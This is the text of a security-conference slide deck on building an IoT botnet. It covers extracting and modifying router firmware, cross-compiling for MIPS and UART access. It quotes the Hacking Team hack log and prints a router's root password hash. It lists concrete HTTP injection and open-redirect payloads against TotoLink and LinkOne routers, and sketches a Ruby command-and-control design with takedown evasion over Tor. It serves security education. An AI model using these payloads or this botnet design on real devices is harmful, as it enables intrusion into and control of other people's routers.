NullByte-C0nC&C B0tn3t F4ct0ry

by: Torontux

1011100101001010100101010101010010101010101010010101010

1011100101001010100101010101010010101010101010010101010

# whoami

* Toronto Garcez aka Torontux

* Pentester

* IoT cell leader

* BWCon www.bwcon.com.br

# cat agenda.txt

* Motivation* Firmwares - how to get? - binwalk + firmware-mod-kit - Cross Compiling, Malta, Busybox* Bugs + bugs + bugs ...* C&C (cec.rb + bn.rb) * Demo* Next steps

# wget http://pastebin.com/raw/0SNSvyjJ

_ _ _ ____ _ _ | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | _ | (_| | (__| < | |_) | (_| | (__| <|_| |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) A DIY Guide

,-._,-._ _,-\ o O_/; / , ` `| | \-.,___, / ` \ `-.__/ / ,.\ / `-.__.-\` ./ \' / /| ___\ ,/ `\ ( ( |.-"` '/\ \ ` \ \/ ,, | \ _ \| o/o / \. \ , / / ( __`;-;'__`) \\ `//'` `||` `\ _// || __ _ _ _____ __ .-"-._,(__) .(__).-""-. | | | | |_ _| | / \ / \ | | |_| | | | | \ / \ / | | _ | | | | `'-------` `--------'` __| |_| |_| |_| |__ #antisec

# cat hacklog.txt

“So, I had three options: look fora 0day in Joomla, look for a 0day in

postfix, or look for a 0day in one of theembedded devices. A 0day in an embedded device seemed like the easiest option,and after two weeks of work reverse engineering, I got a remote root

exploit.”

“ I did a lot of work and testing before using the exploit against Hacking Team.

I wrote a backdoored firmware, and compiled various post-exploitation tools

for the embedded device.”

# man firmwares

* Download Firmware updates

* Extract from serial(UART)

* Looking for filesystem

# man firmwares

* binwalk + hexdump + firmware-mod-kit

* Look for big chunks of 00s or FFs delimiting the parts

* Check for common compression stream patterns

-> zlib: 78 01, 78 9C, 78 DA -> gzip: 1F 8B -> LZMA: 5D 00 00 80

* Offset to extract de filesystem

* squashfs

# hexdump -c wr740nv6.bin |more

00000000 01 00 00 00 54 50 2d 4c 49 4e 4b 20 54 65 63 68 |....TP-LINK Tech |00000010 6e 6f 6c 6f 67 69 65 73 00 00 00 00 76 65 72 2e |nologies....ver.|00000020 20 31 2e 30 00 00 00 00 00 00 00 00 00 00 00 00 | 1.0............|00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|00000040 07 40 00 06 00 00 00 01 00 00 00 00 df 34 0f 03 |.@...........4..|00000050 18 76 7d 82 2f 96 05 35 43 b2 be 7b 00 00 00 00 |.v}./..5C..{....|00000060 d6 3b e9 70 2e 5b ca 44 4a e9 a7 33 e1 d9 9b ee |.;.p.[.DJ..3....|00000070 00 00 00 00 80 00 20 00 80 1c cf b0 00 3e 02 00 |...... ......>..|

...

00120200 68 73 71 73 53 02 00 00 74 d1 1c 56 00 00 02 00 |hsqsS...t..V....|00120210 29 00 00 00 02 00 11 00 e0 00 01 00 04 00 00 00 |)...............|00120220 0b 0b 5b 0e 00 00 00 00 2b e6 2a 00 00 00 00 00 |..[.....+.*.....|00120230 23 e6 2a 00 00 00 00 00 ff ff ff ff ff ff ff ff |#.*.............|

...

# binwalk wr740nv6_br.bin

DECIMAL HEX DESCRIPTION---------------------------------------------------------------------0 0x0 TP-Link firmware header, firmware version: 0.-15447.3, ...13424 0x3470 U-Boot version string, U-Boot 1.1.413472 0x34A0 CRC32 polynomial table, big endian14784 0x39C0 uImage header, OS: Linux, CPU: MIPS, compression

type: lzma, image name: "u-boot image"14848 0x3A00 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 93336 bytes131584 0x20200 TP-Link firmware header, firmware version: 0.0.3132096 0x20400 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2495224 bytes1180160 0x120200 Squashfs filesystem, little endian, version 4.0...

# dd if=wr740nv6_br.bin skip=1 bs=1180160 of=filesystem.squashfs2+1 registros de entrada2+1 registros de saída2883584 bytes (2,9 MB) copiados, 0,0106605 s, 270 MB/s# file filesystem.squashfs filesystem.squashfs: Squashfs filesystem, little endian, version 4.0,

# binwalk -e wr740nv6_br.bin

DECIMAL HEX DESCRIPTION--------------------------------------------------------------------------0 0x0 TP-Link firmware header, firmware version: 0.-15447.3, ... ...1180160 0x120200 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2811435 bytes, 595 inodes, blocksize: 131072 bytes, created: 2015-10-13 09:40:04

total 52K4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 bin4,0K drwxr-xr-x 3 root root 4,0K Set 21 2015 dev4,0K drwxr-xr-x 7 root root 4,0K Set 21 2015 etc4,0K drwxr-xr-x 5 root root 4,0K Set 21 2015 lib 0 lrwxrwxrwx 1 root root 11 Nov 15 13:57 linuxrc -> bin/busybox4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 mnt4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 proc4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 root4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 sbin4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 sys4,0K drwxrwxrwt 2 root root 4,0K Set 21 2015 tmp4,0K drwxr-xr-x 4 root root 4,0K Set 21 2015 usr4,0K drwxr-xr-x 3 root root 4,0K Set 21 2015 var4,0K drwxr-xr-x 10 root root 4,0K Out 13 2015 web

# ls -lhs _wr740nv6_br.bin.extracted/squashfs-root/

# binwalk wr720nv2-en-up.bin

DECIMAL HEXADECIMAL DESCRIPTION------------------------------------------------------------------20 0x14 IMG0 (VxWorks) header, size: 155987226740 0x6874 VxWorks operating system version "5.5.1" , compiled: "Jun 18 2013, 12:19:11"26836 0x68D4 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 636256 bytes262292 0x40094 IMG0 (VxWorks) header, size: 1297600262420 0x40114 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 3657936 bytes1256228 0x132B24 Wind River management filesystem, compressed, 194 files1265584 0x134FB0 LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 14696 bytes1268652 0x135BAC LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 629 bytes1268992 0x135D00 LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 2731 bytes

# man firmware-mod-kit

./extract-firmware.sh wr740nv6_br.bin

fmk/rootfs/ fmk/new-filesystem.squashfs fmk/logs/config.log fmk/logs/binwalk.log fmk/image_parts/header.img fmk/image_parts/rootfs.img

./build-firmware.sh

fmk/new-firmware.bin

# man cross compiling |grep mips

* gcc-mips-linux-gnu

* -static option (Will increase size)

* strip

* Tks Rafael Machado ;)

root@debian-mips:~# ls -lhsa4,0K drwx------ 5 root root 4,0K Nov 25 18:18 .4,0K drwxr-xr-x 21 root root 4,0K Dez 8 2013 ..

664K -rwxr-xr-x 1 root root 657K Nov 25 18:18 teste

root@debian-mips:~# strip teste 4,0K drwx------ 5 root root 4,0K Nov 25 18:18 .4,0K drwxr-xr-x 21 root root 4,0K Dez 8 2013 ..608K -rwxr-xr-x 1 root root 604K Nov 25 18:19 teste

# man qemu |grep mips

* https://www.linux-mips.org/wiki/MIPS_Malta

* Debian Squeeze and Wheezy mips images for QEMU: https://people.debian.org/~aurel32/qemu/mips/

qemu-system-mips -M malta -m 256 -kernel \ vmlinux-2.6.32-5-4kc-malta -hda \ debian_squeeze_mips_standard.qcow2 -append \ "root=/dev/sda1 console=tty0" -vnc \ 172.16.68.128:0 -net nic -net \ user,hostfwd=tcp::2222-:22

root@172.16.68.128's password: Linux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC 2013 mips

Last login: Fri Nov 25 17:19:33 2016root@debian-mips:~# root@debian-mips:~# uname -aLinux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC 2013 mips GNU/Linux

# cd busybox && make menuconfig

# man UART

TP-Link TL-WR841ND

- 2 detachable antennas- 4 Port 100/10 Switch- 1 Port 100/10 Wan Interface- 4 MB Flash- 32 MB Ram- WPS Button- Wi-Fi On/Off Button

* Tks Osvaldo! ;)

# man UART

* Find RX/TX/GND/VCC

* VCC 3v3

* GND 0,0

* TX about 3v

* Velocity 115200

cat /etc/shadow

root:$1$GTN.gpri$DlSyKvZKMR9A9Uj9e9wR3/:15502:0:99999:7:::

# cat bugs.txt

* looking for bugs:

- Web applications (XSS,CSRF,LFI,RCE,etc...)

- Memory Corruptions

- Hardcoded passwords and Default credentials

- Backdoors

- Information disclosures

# cat totolink_payload.txtPOST /login.cgi HTTP/1.1Host: 192.168.1.1Referer: http://192.168.1.1/login.htmCookie: SessionID=

username=admin&password=%22%3E%3Cscript%3Ealert%28%22NullByte%22%29%3B%3C%2Fscript%3E&submit.htm%3Flogin.htm=Send

# cat linkOne_payloads.txt

GET /goform/SafeWanWebMan?GO=system_remote.asp&RMEN=1&port=8080&IP=0.0.0.0"%3balert(1)%2f%2f HTTP/1.1Host: 192.168.0.1Cookie: language=en; admin:language=enConnection: keep-alive

POST /goform/SysStatusHandle HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0Referer: http://192.168.0.1/system_status.aspCookie: language=en; admin:language=en

CMD=WAN_CON&GO=system_status.asp&action=;alert(1);

# cat linkOne_payloads2.txt

Open Redirect--------------GET /goform/SysStatusHandle?CMD=&GO=http://www.evil.com.br&action= HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Cookie: language=en; admin:language=enConnection: close

# man cec

* Command and Control

* Ruby

* Client and Server (cec.rb and bn.rb)

* HTTP

* No frameworks(cgi)

# man cec

- C&C

C&C client

bot.sh

comands

5s

5s

5s

# ./demo

# cat next_steps.txt

* Fix bugs

* Code refactor

* More features

* Criptography

* Clients to ARM / MIPS / etc...

* TakeDown Evasion

# man tor2web

* https://www.tor2web.org/

“Tor is a software project that lets you anonymously browse the Internet. Tor2web is a project to let Internet users access Tor Onion Services without using Tor Browser”

* replace .onion with .onion.to or .onion.city or .onion.cab or .onion.direct

Anonymity for the server• eqt5g4fuenphqinx.onion• End-to-end encryption

Questions?